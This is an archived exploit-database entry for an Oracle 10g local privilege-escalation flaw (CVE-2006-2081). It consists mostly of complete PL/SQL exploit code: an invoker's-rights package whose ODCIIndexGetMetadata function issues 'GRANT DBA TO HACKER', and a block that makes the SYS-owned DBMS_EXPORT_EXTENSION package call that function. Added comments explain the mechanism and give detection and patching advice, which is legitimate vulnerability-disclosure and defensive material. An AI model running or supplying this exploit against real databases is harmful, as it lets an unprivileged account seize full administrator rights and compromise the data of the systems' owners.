Oracle <= 10g Release 2 DBMS_EXPORT_EXTENSION Local SQL Exploit

2006-04-26T00:00:00
ID EDB-ID:1719
Type exploitdb
Reporter N1V1Hd
Modified 2006-04-26T00:00:00

Description

Oracle <= 10g Release 2 (DBMS_EXPORT_EXTENSION) Local SQL Exploit. CVE-2006-2081, CVE-2006-2505. Local exploit for multiple platforms.

                                        
                                            /* 0day, description is wrong. /str0ke */

/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/

-- Package specification for the proof of concept. It is created in the schema of
-- the account that runs this script (the anonymous block further down names that
-- schema HACKER), so the account only needs to be able to create a package of
-- its own.
-- AUTHID CURRENT_USER makes this an invoker's-rights package: its code runs with
-- the privileges of whoever calls it, not of its owner. The escalation depends on
-- that property, because the caller in this script is a package owned by SYS.
-- Defender note: a package outside the Oracle-supplied schemas that exposes a
-- function named ODCIIndexGetMetadata is worth reviewing (DBA_PROCEDURES lists
-- package subprograms by owner).
CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
-- Declares a function with the name and parameter list of the ODCI
-- extensible-indexing metadata routine, so that export-support code looking for
-- that routine in this package will find and call it.
-- NOTE(review): the package body never reads these parameters -- only the
-- signature matters here.
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER;
END;
/

-- Package body: implements the single function declared in the specification.
-- The function ignores all four arguments, issues one GRANT through dynamic SQL
-- and returns 1.
-- Defender note: the observable outcome is a DBA role grant to an account that
-- should not hold it. Auditing role grants and periodically checking
-- DBA_ROLE_PRIVS for unexpected DBA grantees will surface this. The fix is the
-- vendor patch for the CVEs listed on this page. A commonly recommended
-- workaround is revoking EXECUTE on SYS.DBMS_EXPORT_EXTENSION from PUBLIC --
-- confirm against export tooling before applying it.
CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER
IS
-- Runs the function in its own transaction, independent of the caller's, so the
-- GRANT and COMMIT below do not depend on the calling transaction's state.
pragma autonomous_transaction;
BEGIN
-- The grant is executed with the privileges in effect at call time (invoker's
-- rights, see AUTHID CURRENT_USER in the specification). It succeeds only when
-- the caller is privileged enough to grant DBA.
EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
COMMIT;
-- Returns a constant. Nothing visible on this page shows how the caller uses it.
RETURN(1);
END;

END;
/

-- Anonymous block that triggers the issue: it calls the SYS-owned
-- DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA and passes the caller's own
-- schema and package as the index type to be consulted.
-- Root cause as far as this page shows: the SYS package accepts a
-- caller-supplied TYPE_SCHEMA / TYPE_NAME and ends up running code from that
-- package with its own privileges. Presumably it calls the type's
-- ODCIIndexGetMetadata function -- confirm against the vendor advisory.
-- NOTE(review): the named-parameter arrows in the call below are HTML-escaped,
-- an artifact of how the page was captured.
DECLARE
-- Local variables mirror the parameter names of the procedure being called.
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
-- NEWBLOCK is never assigned in this block, so it is passed as NULL.
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
-- 'A1' is an index name supplied by the script. No index of that name is
-- created anywhere on this page.
INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER';
-- Points the call at the package defined above, in the unprivileged schema.
TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER';
-- Version string matches the release named in the header comment of this file.
VERSION := '10.2.0.2.0'; GMFLAGS := 1;

-- The return value is stored but never inspected. The effect the script is
-- after is the side effect inside the package body, not this result.
v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
INDEX_NAME =&gt; INDEX_NAME, INDEX_SCHEMA =&gt; INDEX_SCHEMA, TYPE_NAME
=&gt; TYPE_NAME,
TYPE_SCHEMA =&gt; TYPE_SCHEMA, VERSION =&gt; VERSION, NEWBLOCK =&gt;
NEWBLOCK, GMFLAGS =&gt; GMFLAGS
);
END;
/

// milw0rm.com [2006-04-26]